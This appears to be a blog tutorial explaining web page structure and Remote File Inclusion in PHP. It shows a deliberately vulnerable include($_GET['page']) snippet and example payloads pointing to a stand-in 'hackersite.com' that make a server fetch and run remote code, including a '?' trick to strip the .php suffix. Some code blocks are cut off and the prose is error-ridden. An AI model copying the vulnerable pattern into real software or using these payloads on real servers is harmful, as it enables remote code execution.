Webpage Structure and Remote File
Inclusion
I. WEBSITE STRUCTURE
In this section, we will show how a web
page is built up in general. A normal website consists of HTML. The HTML
consists of a HEAD section and a BODY section.
|
LOGO
|
|
NAVIGATION
|
|
MAIN CONTENT
|
|
NAVIGATION OR COPYRIGHT
|
(Normal looking website layout)
The image above is one of the most common website layouts ever.
Code:
|
<html>
<head>
<title>A Common Website
Layout</title>
</head>
<body>
<div align="center"
class="logo-area"></div>
<div align="center"
class="navigation-area">
<a
href="index.php?page=home">Home</a>
<a
href="index.php?page=page1">Page1</a>
<a href="index.php?page=page2">Page2</a>
</div>
<div align="center"
class="main-content-area">
Content Content Content
|
This is one of an endless amount of ways
you could build this website layout with HTML. It will have a logo, navigation,
and a main content area. The navigation will have three links (Home, Page1 and
Page2). But none of the links will do anything other than sending you to the
same page over and over again without changing the content. This type of page
is referred to as a static HTML page. The HTML of any page can be viewed by right
clicking the page in your browser and the go to 'view source' or something similar.
This is not true for viewing PHP code in web pages. The only way to view the
PHP code of a page is if you can read the file itself, not from your browser. Commonly, RFI attacks are possible because of a PHP configuration flag
called register_globals. It’s automatically defines variables
in the script that are sent to the webpage with method GET. Typically PHP URL looks like: http://www.oursite.com/index.php
this is an example only, there is no such sites. Now we can rewrite the page
above with PHP code in it, to make different content for each of the links (Home,
Page1 and Page2).
Code:
|
<html>
<head>
<title>A Common Website
Layout</title>
</head>
<body>
<div align="center"
class="logo-area"></div>
<div align="center"
class="navigation-area">
<a
href="index.php?page=home">Home</a>
<a
href="index.php?page=page1">Page1</a>
<a
href="index.php?page=page2">Page2</a>
</div>
<div align="center"
class="main-content-area">
<?php
|
The first things the PHP code will look at
GET method or arguments with the name “page” are present in the URL. If it is
it will look further for the argument's value. If the value is
"home", it will write out "home" to the HTML source. If the
argument's value is "page1" it will write home "page1" to
the HTML source and so on.However if the argument
is not present in the URL, it will show index.php. So the script will give the
equivalent value of the “home” page. Navigation link
Ø Home goes to http://www.oursite.com/index.php?
Ø Page1 goes to http://www.oursite.com/index.php?page=page1
Ø Page2 goes to http://www.oursite.com/index.php?page=page2
and so on.
II. UNDERSTANDING RFI
In itself, they include() function is not
vulnerable to anything. It’s wrong and dangerous use of it that causes the
security issues. They include() function is not limited to reading local files.
It can even read remote files from URL's. So you could do include ("http://site.com/pages/page.txt")
and it would include the contents of page.txt this is what creates RFI
scenarios. Let’s create a new scenario index.php, 1.php, 2.php, and 3.php. index.php
is the file the users are going to visit with his browser. When the user first
visits the index.php, then we are going to display 3 links.
Code:
|
<a href="index.php?page=1">Page
1</a>
<a
href="index.php?page=2">Page 2</a>
<a
href="index.php?page=3">Page 3</a>
|
When the user clicks the first link its
going to show the content of 1.php, when the user clicks the second link its
going to show the contents of 2.php and when the user clicks the last link its
going to show the contents of 3.php, look at the index.php
script now the coding is to create security holes.
Code:
|
if (isset($_GET['page']))
{
// The GET argument is present.
Lets include the page.
include($_GET['page'] .
".php");
}
else
{
// The GET argument is not
present. Lets give the poor guy some links!
echo('<p><a
href="index.php?page=1">Page 1</a></p>');
echo('<p><a
href="index.php?page=2">Page 2</a></p>');
echo('<p><a
href="index.php?page=3">Page 3</a></p>');
}
|
Now click the Page 1 link, it will show (www.oursite.com/index.php?page=1).
The PHP script in index.php will now see that the user is requesting the page called
1 and it will include the number in the URL GET argument + ".php" the
same goes for 2 and 3. So, for Page 1 it will include 1.php, for Page 2 it will
include 2.php and for Page 3 it will include 3.php. The above script is a death
trap. Like (www.oursite.com/index.php?page=4?),
it will try to include 4.php, but that file obviously does not exist. So the
page would return an error message like this:
|
Warning: include (4.php)
[function.include ]: failed to open stream : No such file or directory in
PATH online 3
Warning: include () [function.include ]:
Failed opening '4.php' for inclusion (include _path='.;PATH') in PATH\\index
.php online 3
|
It’s important to note that, not all web
servers will show error messages when there is an error. We will try this
index.php?page=http://hackersite.com/hackercode (this is an example only, there
is no such sites). The PHP script would try to include whatever http://hackersite.com/hackercode.php
contains. And if hackercode.php contains more PHP code, it would also get
executed. Meaning we can run any PHP command or function on the server. This is
extremely dangerous. Now we will show .txt index.php?page=http:// hackersite.com/hackerscript.txt
and not hackerscript.txt.php because the ? Sign makes .php and GET argument.
No comments:
Post a Comment